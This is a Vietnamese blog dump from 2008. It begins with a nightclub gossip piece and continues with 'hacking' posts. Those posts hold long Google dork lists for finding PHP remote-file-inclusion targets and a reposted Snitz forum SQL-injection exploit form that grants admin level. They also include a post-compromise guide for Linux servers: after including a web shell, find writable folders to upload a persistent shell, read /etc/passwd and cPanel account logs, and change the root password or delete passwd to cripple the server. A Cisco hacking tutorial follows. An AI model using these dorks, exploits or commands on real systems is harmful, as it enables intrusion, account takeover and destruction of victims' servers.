bài được lấy từ vnit
mảng tối vũ trường Thứ Bảy, Tháng 3 22 2008
Linh Tinh 9:53 sáng
nhìn lại các bạn phải thốt lên rằng không thể tưởng tượng
1 người vào những chỗ đấy 1 lần ít nhất khoảng 1 vé
(nhưng chả ai 1 vé mà vào đó cả
ít nhất 2 người vào đó khi ra về phải bỏ lại khoảng 5 vé )
có tận mắt chứng kiến mới thấy thế hệ trẻ vn ăn chơi như thế nào .
con các đại gia lắm tiền nhiều của
ngày ngủ tối đi bar , vũ trường đi lăk đốt tiền
hcm hiện mưa rừng được gọi là new century thứ 2
chứ như thân phận của tôi làm công ăn lương nhà nước sao đủ đi 1 đêm được
p/s: bài này có sử dụng 1 số tài liệu của bác vnit , tôi chỉ bổ sung địa chỉ các bar vũ trường mà thôi
hình ảnh được tổng hợp từ internet được ghi lại từ các vũ trường như
tại các sàn như mưa rừng (hcm) , ý niệm (daklak) , blue moon (vũ tàu), start (vũng tàu) phương đông (hcm)…
địa chỉ bar (vũ trường ý niệm)
37 Lê Thánh Tông, TP Buôn Ma Thuột, Đắk Lắk
địa chỉ vũ trường mưa rừng
5-15 HỒ HUẤN NGHIỆP, Phường P BẾN NGHÉ, Quận 1, Tp. Hồ Chí Minh
Vũ Trường Shark
5-15 Hồ Huấn Nghiệp, Quận 1, Tp. Hồ Chí Minh
Điện thoại: 84-8-8257783
Fax: 84-8-8237378
Vũ Trường Queen Bee
104-106 Nguyễn Huệ, Quận 1, Tp. Hồ Chí Minh
Vũ Trường hoa hồng
105 TRẦN HƯNG ĐẠO, Phường P, Quận 5, Tp. Hồ Chí Minh
Sàn nhảy “Mưa Rừng” (TP HCM) được bắt đầu từ 21h và kéo dài đến hơn 3h sáng. Vào giờ đó, trong mờ mịt khói thuốc và âm nhạc chát chúa đến tức ngực, đám “nam thanh, nữ tú” đã tập hợp khá đông. Đèn tắt, âm nhạc nổi lên, 4 cô gái trẻ đẹp tuổi mới đôi mươi trong y phục khêu gợi ào ra sàn nhảy. Không khí sôi động hẳn. Các cô gái uốn éo trên bục nhảy, cả đám thanh niên ùa ra sàn và quay cuồng. Hơn 23h, một chiếc phi thuyền điện tử với nhiều bóng đèn nhấp nháy chói mắt nhịp nhàng chạy lên chạy xuống chở theo hai cô gái khác đứng phía trên, nhún nhảy, múa may biểu diễn với những động tác vô cùng khêu gợi và dung tục.
Không gian vũ trường tưởng chừng như đọng lại. Nhiều cặp mắt đổ dồn vào thân hình cô gái trẻ đang uốn éo. Trong khi đó, ngoài sàn nhảy, những gương mặt non choẹt hết đỏ bừng lại xanh tái vì ánh đèn như đang lên đồng. Họ giậm giật, gật gù, lắc theo điệu nhạc, hoặc mơn trớn, vuốt ve thân thể nhau ngay giữa sàn nhảy. Họ đang say…
Tại một sàn nhảy khác, “Long Vân”, một nhóm thanh niên chừng từ 17 đến 20 tuổi, với những cái đầu nhuộm vàng – tím – đỏ chụm quanh chiếc bàn đầy vỏ lon bia và một vài viên thuốc. Sau một hồi họ bắt đầu đứng chụm lại, thân hình khum khum, nhún nhảy, rồi lắc, lắc… như điên trong cơn say của thuốc , của men bia.
Hoà vào bầu không khí cuồng nộ là một thứ âm nhạc với thể loại rap của các nước Á, Âu, Mỹ, và cả rap Việt Nam. Tại một sàn nhảy của TP HCM, sau khi một ca sĩ vô danh nào đó gào thét một tràng như đang cãi nhau, âm thanh chợt im bặt trong 20 giây rồi ầm ầm nổi lên trở lại, chàng ca sĩ thét lên một câu chửi tục tĩu: “We are fuck you”.
Tìm RFI với google phần 2 Thứ Sáu, Tháng 3 21 2008
hacking 4:12 sáng
index.php?template= inurl:”index.php?”
search.php?cutepath= inurl:”search.php?”
show_news.php?cutepath= inurl:”show_news.php?”
page.php?doc= allinurl:”page.php?doc=”
administrator/components/com_webring/admin.webring.docs.php?component_dir= inurl:”com_webring”
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path= inurl:”.de.*/com_mgm”
help.php?css_path= inurl:phplive site:.ru
components/com_galleria/galleria.html.php?mosConfig_absolute_path= inurl:”com_galleria/”
big.php?pathtotemplate= inurl:”.de.*”big.php?”
includes/search.php?GlobalSettings[templatesDirectory]= inurl:”.com”search.php?”
interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include= “Papoo CMS”
/functions.php?include_path= “powered by: phpecard”
modules/My_eGallery/index.php?basepath= inurl:”.de.*”My_eGallery”
components/com_galleria/galleria.html.php?mosConfig_absolute_path= inurl:”.net.*”com_galleria/”
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= “powered by CubeCart 3.0.6″
/class.mysql.php?path_to_bt_dir= “powered by paBugs 2.0 Beta 3″
/include/footer.inc.php?_AMLconfig[cfg_serverpath]= “powered by AllMyLinks”
/squirrelcart/cart_content.php?cart_isp_root= allinurl:/squirrelcart/
index2.php?to= inurl:”/index2.php?to=*.php”
index.php?load= inurl:”/index.php?load=*.php”
home.php?pagina= inurl:”home.php?pagina=”
/modules/coppermine/include/init.inc.php?CPG_M_DIR= allinurl:modules.php?name=coppermine
/modules/Forums/admin/admin_styles.php?phpbb_root_path= allinurl:modules.php?name=forums
/modules/vwar/admin/admin.php?vwar_root= allinurl:modules.php?name=vwar
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path= allinurl:modules.php?name=PNphpBB2
/modules/My_eGallery/public/displayCategory.php?basepath= allinurl:modules.php?name=my_egallery
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= allinurl:modules.php?name=xgallery
/modules/4nAlbum/public/displayCategory.php?basepath= allinurl:modules.php?name=4nAlbum
/include/write.php?dir= allinurl:/zboard/zboard.php
db.php?path_local= inurl:”db.php?path_local=”
index.php?site= inurl:”index.php?site=”
index.php?url= inurl:”index.php?url=”
index.php?p= inurl:”index.php?p=”
index.php?openfile= inurl:”index.php?openfile=”
index.php?file= inurl:”index.php?file=”
index.php?go= inurl:”index.php?go=”
index.php?content= inurl:”index.php?content=”
index.php?side= inurl:”index.php?side=”
index.php?kobr= inurl:”index.php?kobr=”index.php?pg= inurl:”index.php?pg=”
index.php?doc= inurl:”index.php?doc=”
index.php?l= inurl:”index.php?l=”
index.php?a= inurl:”index.php?a=”
index.php?principal= inurl:”index.php?principal=”
index.php?show= inurl:”index.php?show=”
index.php?opcao= inurl:”index.php?opcao=”
index.php?conteudo= inurl:”index.php?conteudo=”
index.php?meio= inurl:”index.php?meio=”
index.php?inc= inurl:”index.php?inc=”
index.php?c= inurl:”index.php?c=”
index.php?rage= inurl:”index.php?rage=”
index.php?arquivo= inurl:”index.php?arquivo=”
index.php?nic= inurl:”index.php?nic=”
index.php?x= inurl:”index.php?x=”
components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path= inurl:”com_mtree”
index.php?place= inurl:”index.php?place=”
index.php?show= inurl:”index.php?show=”
index.php?dsp= inurl:”index.php?dsp=”
index.php?dept= inurl:”index.php?dept=”
index.php?lg= inurl:”index.php?lg=”
index.php?inhalt= inurl:”index.php?inhalt=”
index.php?ort= inurl:”index.php?ort=”
index.php?pilih= inurl:”index.php?pilih=”
principal.php?conteudo= inurl:”principal.php?conteudo=”
main.php?site= inurl:”main.php?site=”
template.php?pagina= inurl:”template.php?pagina=”
contenido.php?sec= inurl:”contenido.php?sec=”
index_principal.php?pagina= inurl:”index_principal.php?pagina=”
template.php?name= inurl:”template.php?name=”
forum.php?act= inurl:”forum.php?act=”
home.php?action= inurl:”home.php?action=”
home.php?pagina= inurl:”home.php?pagina=”
noticias.php?arq= inurl:”noticias.php?arq=”
main.php?x= inurl:”main.php?x=”
main.php?page= inurl:”main.php?page=”
default.php?page= inurl:”default.php?page=”
index.php?cont= inurl:”index.php?cont=”
index.php?configFile= inurl:”index.php?configFile=”
index.php?meio.php= inurl:”index.php?meio.php=”
index.php?include= inurl:”index.php?include=”
index.php?open= inurl:”index.php?open=
index.php?visualizar= inurl:”index.php?visualizar=”
index.php?x= inurl:”index.php?x=”
index.php?pag= inurl:”index.php?pag=”
index.php?cat= inurl:”index.php?cat=”
index.php?action= inurl:”index.php?action=”
index.php?do= inurl:”index.php?do=”
index2.php?x= inurl:”index2.php?x=”
index2.php?content= inurl:”index2.php?content=”
main.php?pagina= inurl:”main.php?pagina=”
index.phpmain.php?x= inurl:”index.phpmain.php?x=”
index.php?link= inurl:”index.php?link=”
index.php?canal= inurl:”index.php?canal=”
index.php?screen= inurl:”index.php?screen=”
index.php?langc= inurl:”index.php?langc=”
services.php?page= inurl:”services.php?page=”
htmltonuke.php?filnavn= inurl:”htmltonuke.php?filnavn=”
ihm.php?p= inurl:”ihm.php?p=”
default.php?page= inurl:”default.php?page=”
folder.php?id= inurl:”folder.php?id=”
index.php?Load= inurl:”index.php?Load=”
index.php?Language= inurl:”index.php?Language=”
hall.php?file= inurl:”hall.php?file=”
hall.php?page= inurl:”hall.php?page=”
template.php?goto= inurl:”template.php?goto=”
video.php?content= inurl:”video.php?content=”
pages.php?page= inurl:”pages.php?page=”
print.php?page= inurl:”print.php?page=”
show.php?page= inurl:”show.php?page=”
view.php?page= inurl:”view.php?page=”
media.php?page= inurl:”media.php?page=”
index1.php?choix= inurl:”index1.php?choix=”
index1.php?menu= inurl:”index1.php?menu”
index.php?ort= inurl:”index.php?ort=”
index2.php?showpage= inurl:”index2.php?showpage=”
index2.php?ascii_seite= inurl:”index2.php?ascii_seite=”
index2.php?DoAction= inurl:”index2.php?DoAction=”
index2.php?ID= inurl:”index2.php?ID=”
index2.php?url_page= inurl:”index2.php?url_page=”
index1.php?dat= inurl:”index1.php?dat=”
index1.php?site= inurl:”index1.php?site=”
index0.php?show= inurl:”index0.php?show=”
home.php?content= inurl:”home.php?content=”
port.php?content= inurl:”port.php?content=”
main.php?link= inurl:”main.php?link=”
home.php?x= inurl:”home.php?x=”
index1.php?x= inurl:”index1.php?x=”
index2.php?x= inurl:”index2.php?x=”
main.php?x= inurl:”main.php?x=”
homepage.php?sel= inurl:”homepage.php?sel=”
/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR= allinurl:/xoopsgallery/
/modules/agendax/addevent.inc.php?agendax_path= allinurl:/agendax/
/include/main.php?config[search_disp]=true&include_dir= allinurl:/osticket/
/contrib/yabbse/poc.php?poc_root_path= ntitle:PHPOpenChat ext:php
/phpopenchat/contrib/yabbse/poc.php?sourcedir= ntitle:PHPOpenChat ext:php
/photoalb/lib/static/header.php?set_menu= allintitle:iPhotoAlbum
/squito/photolist.inc.php?photoroot= “Squitosoft All Rights Reserved”
/bz/squito/photolist.inc.php?photoroot= “Squitosoft All Rights Reserved”
/ppa/inc/functions.inc.php?config[ppa_root_path]= allinurl:**/screens/displayimage.php?pid=*
/spid/lang/lang.php?lang_path= allinurl:**/spid.php allinurl:**/spid.php?cat=*lang=
/classes.php?LOCAL_PATH= “powered by siteframe”
al_initialize.php?alpath= “Powered by AutoLinks Pro”
/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]= allinurl:*br*/newbb_plus/*
/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= “Powered by Mambo” inurl:*gov*
/extensions/moblog/moblog_lib.php?basedir= “powered by pivot”
/app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH= “phpCodeGenie v. 3.0.2″
components/com_performs/performs.php?mosConfig_absolute_path= inurl:”com_performs”
modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]= inurl:”AllMyGuests”
/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path= allinurl:”com_rsgallery”
/components/com_smf/smf.php?mosConfig_absolute_path= allinurl:”com_smf”
/components/com_cpg/cpg.php?mosConfig_absolute_path= index.php?option=com_cpg
administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path= inurl:”com_peoplebook”
/admin_modules/admin_module_deldir.inc.php?config[path_src_include]= “Powered by yappa-ng 2.3.1″
inc/cmses/aedating4CMS.php?dir[inc]= inurl:flashchat site:br bp_ncom.php?bnrep= “Script rйalisй par BinGo PHP”
/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path= inurl:”/com_mtree/”
/jscript.php?my_ms[root]= intitle:”myspeach” inurl:”chat_exemple.php”
/popup_window.php?site_isp_root= inurl:”Squirrelcart”
/yabbse/Sources/Packages.php?sourcedir= inurl:Yabbse
/include/main.php?config[search_disp]=true&include_dir= allinurl:/osticket/ site:fr
/include/main.php?config[search_disp]=true&include_dir= allinurl:/osticket/ site:us
/includes/functions_portal.php?phpbb_root_path= “powered by Integramod”
Tìm RFI với google (phần 1) Thứ Sáu, Tháng 3 21 2008
hacking 4:11 sáng
surveys/survey.inc.php?path= inurl:surveys
index.php?body= inurl:”index.php?body=”
/classes/adodbt/sql.php?classes_dir= allinurl:adobt site:pl
enc/content.php?Home_Path= “powered by doodle cart”
/classified_right.php?language_dir= inurl:classified.php phpbazar
/sources/functions.php?CONFIG[main_path]= “(Powered By ScozNews)”
/sources/template.php?CONFIG[main_path]= “(Powered By ScozNews)”
/embed/day.php?path= intitle:”Login to Calendar”
/includes/dbal.php?eqdkp_root_path= “powered by EQdkp”
/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= “Powered By Aardvark Topsites PHP 4.2.2″
/includes/kb_constants.php?module_root_path= “Powered by Knowledge Base”
/mcf.php?content= allinurl:”mcf.php” site:.de
/components/com_facileforms/facileforms.frame.php?ff_compath= allinurl:”com_facileforms” site:.ar
skins/advanced/advanced1.php?pluginpath[0]= “Sabdrimer CMS”
/zipndownload.php?PP_PATH= “Powered by: PhotoPost PHP 4.6″
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path= inurl:”com_serverstat”
/components/com_zoom/includes/database.php?mosConfig_absolute_path= inurl:”index.php?option=”com_zoom”
/main.php?sayfa= inurl:”main.php?sayfa=”
/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= allinurl:com_extended_registration
/addpost_newpoll.php?addpoll=preview&thispath= allinurl:”/ubbthreads/”
/header.php?abspath= “MobilePublisherPHP”
components/com_performs/performs.php?mosConfig_absolute_path= inurl:”com_performs”
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:index.php?option=com_remository
impex/ImpExData.php?systempath= intext:powered by vbulletin
/modules/vwar/admin/admin.php?vwar_root= allinurl:vwar site:.com
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= “powered by phpCOIN 1.2.3″
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:.com/index.php?option=com_remository
/tools/send_reminders.php?includedir= allinurl:day.php?date=
/skin/zero_vote/error.php?dir= skin/zero_vote/error.php
/modules/TotalCalendar/about.php?inc_dir= allinurl:/TotalCalendar
/login.php?dir= allinurl:login.php?dir=
/tags.php?BBCodeFile= intitle:”Tagger LE” inurl:tags.php
index.php?pageurl= inurl:”index.php?pageurl=*.php”
/templates/headline_temp.php?nst_inc= allintitle:fusion:news:management:system
index.php?var= inurl:”index.php?var=*.php”
index.php?pagina= inurl:”index.php?pagina=*.php”
index.php?go= inurl:”index.php?go=”
index.php?site= inurl:”index.php?site=”
phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= inurl:”phpwcms/index.php?id=”
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:”.com.*/index.php?option=com_comprofiler”
index.php?pagina= inurl:”index.php?pagina=*.php”
index.php?id= inurl:”index.php?id=*.php”
index1.php?= inurl:”index1.php?=*.php?
index.php?site= inurl:”index.php?site=*.php”
main.php?id= inurl:”main.php?id=*.php”
content.php?page= inurl:”content.php?page=*.php”
admin.php?page= inurl:”admin.php?page=*.php”
lib/gore.php?libpath= inurl:”/SQuery/”
SQuery/lib/gore.php?libpath= inurl:”/SQuery/”
index2.php?p= inurl:”index2.php?p=*.php”
index1.php?go= inurl:”index1.php?go=*.php”
news_detail.php?file= inurl:”news_detail.php?file=*.php”
old_reports.php?file= inurl:”old_reports.php?file=*.php”
index.php?x= inurl:”index.php?x=*.php”
index.php?nic= inurl:”index.php?nic=*.php”
homepage.php?sel= inurl:”homepage.php?sel=*.php”
index.php?sel= inurl:”index.php?sel=*.php”
main.php?x= inurl:”main.php?x=*.php”
components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path= “inurl:com_artlinks”
index2.php?x= inurl:index2.php?x=*.php”
main.php?pagina= inurl:”main.php?pagina=*.php”
test.php?page= allinurl:test.php?page=
components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= “inurl:com_phpshop”
akocomments.php?mosConfig_absolute_path= inurl:akocomments.php
index.php?page= inurl:”edu/index.php?page=*.php”
*.php?page= inurl:*.php?page=*.php”
index.php?oldal= inurl:”index.php?oldal=*.php”
index.php?lang=gr&file inurl:”index.php?lang=gr&file=*.php”
index.php?pag= inurl:”index.php?pag=*.php”
index.php?incl= inurl:”index.php?incl=”
avatar.php?page= inurl:”avatar.php?page=”
index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= “Mambo is A Free
index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= “Mambo is”
ndex.php?p= inurl:”edu/index.php?p=*.php”
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= allinurl:/xgallery/
index.php?x= inurl:”com/index.php?x=*.php”
index.php?mode= inurl:”com/index.php?mode=*.php”
index.php?stranica= inurl:”index.php?stranica=”
index.php?sub= inurl:”il/index.php?sub=*.php”
index.php?id= inurl:”/index.php?id=*.php”
index.php?t= inurl:”/index.php?t=*.php”
index.php?r= inurl:”index.php?r=*.php”
index.php?menu= inurl:”net/index.php?menu=*.php”
index.php?pag= inurl:”com/index.php?pag=*.php”
solpot.html?body= allinurl: “solpot.html?body”
port.php?content= inurl:port.php?content=*.php”
index0.php?show= inurl:index0.php?show=*.php”
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:/index.php?option=com_comprofiler”
/tools/send_reminders.php?includedir= allinurl:day.php?date= inurl:/day.php?date=
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:/index.php?option=com_remository
/tags.php?BBCodeFile= intitle:”Tagger LE” inurl:tags.php site:br
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:/index.php?option=com_comprofiler”
content.php?page= inurl:”*content.php?page=*.php”
index.php?topic= inurl:”/index.php?topic=*.php”
index.php?u= inurl:”/index.php?u=*.php”
administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path= inurl:”com_linkdirectory”
administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= inurl:”.tr./components”
modules/My_eGallery/index.php?basepath= inurl:”My_eGallery”
/modules/vwar/admin/admin.php?vwar_root= inurl:”vwar”
index.php?loc= allinurl:.br/index.php?loc=
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:”us/index.php?option=com_comprofiler”
administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= inurl:”com_cropimage”
/tags.php?BBCodeFile= intitle:”Tagger LE” inurl:tags.php
myevent.php?myevent_path= inurl:myevent.php
/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path= allinurl:”com_uhp”
myevent.php?myevent_path= inurl:”uk/myevent.php
includes/functions.php?phpbb_root_path= powered by Integramod
m2f/m2f_phpbb204.php?m2f_root_path= allinurl:/m2f_usercp.php?
/tags.php?BBCodeFile= intitle:”Tagger LE” inurl:”uk/tags.php
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:”us/index.php?option=com_remository
show.php?path= inurl:fclick
show.php?path= inurl:.ac.uk/fclick
administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path= inurl:”.de.*/com_linkdirectory”
administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site= inurl:”com_a6mambocredits”
Rất nhiều trang .vn, chạy snitz forum đã bị hack tối qua (18/3/2008) Thứ Sáu, Tháng 3 21 2008
hacking 4:00 sáng
tình hình là sáng hôm kia lên có admin vào pm hỏi về chuyện này
sau quá trình tìm hiểu thì kết quả là như thế này và nói thêm là buồn cho bảo mật việt nam
########################## WwW.BugReport.IR #########################
#
# AmnPardaz Security Research & Penetration Testing Group
#
# Title: A user can gain admin level in snitz 2000 by SQL Injection
# vendor: http://forum.snitz.com/
# Googling: “Powered by Snitz” > 2,440,000 victims
# Last bug report in 2007-02-16 with 4692 visitors
# Exploit: Available
# Fix Available: Update to last version.
######################## Bug Description ###########################
A user can gain admin level in the forum and can access to the forum.
It is because of a SQL Injection in “Active.asp”
After login to your VICTIM forum, execute below script
~~~~~~~~~~~Start HTML Exploit~~~~~~~~~
<form action=”http://[VICTIM URL]/active.asp” method=”post”>
Query: <input type=”text” name=”BuildTime” value=”‘,M_Level=’3″ /><br />
DefaultValues: <input type=”text” name=”AllRead” value=”Y” /><br />
Submit: <input type=”submit” name=”submit” value=”Submit” /><br />
</form>
~~~~~~~~~~~End HTML Exploit~~~~~~~~~
#####################################################################
# Security Site: WwW.BugReport.ir – WwW.AmnPardaz.Com
# Country: Iran
# Contact: admin@bugreport.ir
# Credit: Soroush Dalili found this bug.
#####################################################################
# milw0rm.com [2007-12-03]
Các lệnh hữu ích khi xâm nhập vào Linux sv Thứ năm, Tháng 3 20 2008
hacking 2:09 sáng
sưu tầm
Giả sử ta đang hack 1 trang web , sau khi include đc 1 con shell vào website ta có 1 shell lệnh để làm việc với Linux .
okie
Vậy đầu tiên ta sẽ phải làm gì , thực hiện những lệnh gì trên con shell của ta để lấy đc thông tin cần thiết , cũng như đảm bảo sự truy cập lâu dài của ta vào sv đó (tức là việc giữ shell) . Ta biết rằng càng rút ngắn đc time thì ta càng làm đc nhiều việc trên sv cũng như tránh đc sự phát hiện của ng quản lý nhất . Chúng ta sẽ bàn về những kinh nghiệm sau khi có đc shell trên 1 sv . okie .
Tôi xin mở đầu trước . Sau khi Include đc 1 con shell vào site , Safe-mod = Off , ta dùng những lệnh gì .
+Tìm ngay thư mục có quyền ghi để Upload 1 con shell “xịn” lên sv bởi vì con shell included của ta đôi khi làm việc ko ổn định. Trên dòng command line tôi gõ :
Trích dẫn:find /home/victim/public_html/ -type d -perm -2 -ls
- tìm kiếm những thư mục & thư mục con có quyền writeable tính từ /home/victim/public_html/
Trích dẫn:find /home/victim/public_html/ -type d -perm -2 -ls
- tìm kiếm những file ta có thể ghi đè lên tính từ /home/victim/public_html/
Ok, và lúc này Linux sẽ tự động tìm kiếm cho ta các thư mục & file có thể “chơi” đc … roài ta tiến hành Upload shell
+Tiếp theo , ta lấy thêm thông tin của sv để dùng khi cần đến , các lệnh ko thể ko biết đó là :
Trích dẫn:cat /etc/passwd : xem File passwdcat /etc/domains : xem các domains trên sv
nếu sv sử dụng cPanelX thì còn đợi gì mà ko
Trích dẫn:cat /var/cpanel/accounting.log : để xem các account trên sv , nó sẽ phơi bày hết domain name & username của từng account , từ đó ta có thể dễ dàng lần ra nó ở đâu (đỡ phải mất công mò mẫm)
bạn muốn tìm user có domain là victim.com thì dùng lệnh sau:
Trích dẫn:cat /var/cpanel/accounting.log | grep “victim.com”
oke, biết vận dụng các lệnh linux là đc
Lấy mấy thông tin về sv khi cần
Trích dẫn:về apache:
whereis apache
cat /usr/local/apache/conf/httpd.confvề log
whereis log
cat /etc/syslog.confcat /etc/hosts : xem IP & domain name của server chính
passwd nằm trong thư mục /etc/passwd
Nếu bạn chiếm được quyền root nêu muốn phá có thể thay pass bằng lện
…/#passwd <—- thay pass
hoặc xóa file passwd thì nó đơ toàn bộ luôn
../#cat <—- xem file ( view pass ..#cat passwd)
ls = dir(windows) muốn biết chi tiết thêm –help sau mỗi lện hoặc nhẫn Tab
Hack vào hệ thống CisCo của Linux Thứ năm, Tháng 3 20 2008
hacking 2:08 sáng
sưu tầm
Hệ thống Cisco được chạy trên server Unix . Nó là 1 hệ thống truyền thông tin theo kiểu những gói dữ liệu , vì vậy khi bạn sẽ ngạc nhiên khi làm sao ta có thể nắm bắt được những tín hiệu của cisco . Thường thì các hệ thống Cisco rất quan trong , nên khi ta hack được vào 1 hệ thống cisco ta có thể nắm bắt những thông tin quan trong của khách hàng , hay thông tin về thẻ tín dụng . Vì vậy các bạn nên chú ý đến tác hại của nó .
Yêu cầu trong bài này các bạn phải biết được những định nghĩa sau :
Trích dẫn:- Thế nào là 1 địa chỉ IP- Thế nào là 1 ISP- Thế nào là 1 TCP/IP packet
- Cách biến đổi IP của bạn
- Cách sử dụng Telnet
- Cách sử dụng Hyper Terminal
- Cách sử dụng Ping
- Cách sử dụng TraceRoute
- Cách sử dụng 1 proxy server
Những kiến thức trên đối với các Hacker thì quá quen thuộc rồi , nhưng đối với những newbie thì có lẽ cũng hơi lơ mơ có phải không .
Vậy thì mình cũng xin giới thiệu qua một chút nha :
1 – IP là gì ?
IP có thể được coi là 1 địa chỉ của 1 máy tính khi được kết nối vào Internet . Nó được các nhà phục vụ mạng ( ISP) gán cho máy tính cá nhân của bạn khi bạn kết nối đến nhà cung cấp dịch vụ .
Có 2 loại IP : đó là IP tĩnh và IP động . thường các bạn nối net bằng PC cá nhân thì là IP động . Còn IP của những server cung cấp Hosting hay Domain trên mạng có IP tĩnh .
IP động là loai mỗi khi vào mạng bãn sẽ có 1 IP khác nhau
IP tĩnh là loại chỉ có duy nhất 1 IP cho tât cả các loại kết nối tại các thời điểm khác nhau .
IP của ban có thể bị nắm dữ của ngời khác thông qua những cách sau :
- khi bạn truy cập vào 1 website , IP của bạn đã được lưu dữ trong 1 file Log
- Khi ban trên IRC thì bất cứ ai cũng có thể có IP của bạn .
- Khi bạn trên ICQ thì những ngời muốn có IP của bạn thì sẽ lấy được cho dù bạn đã không cho hiển thi IP
- Nếu bạn đang được kết nối với 1 máy tính của ai đó , họ có thể sử dụng lệnh ” systat” và xem ai đang được kết nối đến họ
- Nếu bạn gửi một email tới 1 ai đó , thì họ cũng có được IP của bạn .
Còn rất nhiều cách xác định 1 IP của 1 ngời , trong đó còn bao gồm cae những chương trình mở cửa sau nhưSub7 và Netbios .
2. ISP là gì ?
ISP là 1 nhà cung cấp mạng Internet cho bạn . Bạn có thể kết nối với ISP mọi lúc bàng cách dial-up với số cung cấp dịch vụ của ISP . Bạn có thể nhìn thấy ISP của bạn là gì bằng cách rất đơn giản là chạy 1 Traceroute trên máy bạn . ( Traceroute sẽ được nói ở sau ) Bạn sẽ nhìn thấy những gì bạn muốn .
Vidụ :
Trích dẫn:tracert 222.222.22.22Tracing route to [221.223.24.54]over a maximum of 30 hops.
1 147ms 122ms 132ms your.isp [222.222.22.21]
2 122ms 143ms 123ms isp.firewall [222.222.22.20]
3 156ms 142MS 122ms aol.com [207.22.44.33]
4 * * * Request timed out
5 101ms 102ms 133ms cisco.router [194.33.44.33]
6 233ms 143ms 102ms something.ip [111.11.11.11]
7 222ms 123ms 213ms netcom.com [122.11.21.21]
8 152ms 211ms 212ms blahblah.tts.net [121.21.21.33]
9 122ms 223ms 243ms altavista.34.com [121.22.32.43] <<< target’s isp
10 101ms 122ms 132ms 221.223.24.54.altavista.34.com [221.223.24.54]
Trace complete.
———————————–
Nhìn thấy rồi chứ ! OK
3 . Thế nào là 1 TCP/IP packet ( gói dữ liệu TCP/IP )
TCP/IP có nghĩa là Transmission Control Protocol và Internet Protocol ,
Một TCP/IP packet là 1 khối dữ liệu được nén , và một đầu mục được đặt tên nó và được gửi cho máy tính khác theo chuẩn thức TCP/IP . Đầu mục trong 1 gói chứa đựng IP của máy tính được gửi đi và máy tính được gửi đến làm cho gói dữ liệu đến đúng mục tiêu ngời nhận . Bạn có thể Read-write 1 gói dữ liệu làm cho nó có vẻ đến bất kỳ ai , bạn sẽ thu được tất cả những những kết nối đến hệ thống chủ mà không có điều gì xảy ra .
4. Cách biến đổi IP ,hoặc không cho phép bắt giữ IP của bạn :
Bạn hãy tìm chương trinh : Genius 2 or DC IS nó sẽ giúp bạn làm điề đó .
5 . Cách sử dụng Telnet
Rất đơn giản bạn chỉ việc click vao Start menu –> Run ; rồi gõ telnet . Bạn sẽ gọi được chương trình telnet . Bạn có thể vao Terminal>Preferences để thay đổi thông số .
Bạn muốn kết nối tới đâu chỉ việc vào Conect –> Remote System . Rồi đánh Host name cho địa chỉ cần đến . va port . Đối với port : 23 dùng cho telnet , port : 21 dùng cho FTP và port 25 dùng cho dịch vụ sentmail . Có rất nhiều cổng . Sau này nếu bạn là 1 Hacker giỏi bạn có thể gắn Backdoor mở cổng hậu bất kỳ nào mà bạn muốn .
6 Cách sử dụng HyperTerminal
HyperTerminal cho phép bạn mở một server trên bất kỳ port nào của máy tính , và cho phép lăng nghe những thông tin đầu vào từ những máy tính xác định .
Bạn muốn thiết lập nó hãy vào :
Trích dẫn:Start>Programs>Accessories>Communications>HyperTer minal
trước hết bạn cần lựa chọn kết nối , bạn chon “TCP/IP Winsock” , và cần chon 1 cổng bất kỳ trên máy tính , mình sẽ chọn cổng 23 chẳng hạn , Sau đó các bạn thiết lập chế độ Call>Wait for Call
OK ! bây giờ các máy tính khác có thể nối với máy tính bạn trên cổng đó và có thể chia sẻ với nhau những dữ liêu .
7 . Cách sử dụng lệnh ping
Lệnh Ping giúp cho ta biết thông tin về IP hay address mà chúng ta quan tâm .
Ban chỉ cần mở cửa sổ MS-DOs prompt rồi gõ :
Trích dẫn:ping diachitrangweb.com
hoăc:
Trích dẫn:ping ip.máytínhbạnmuốntấncông.
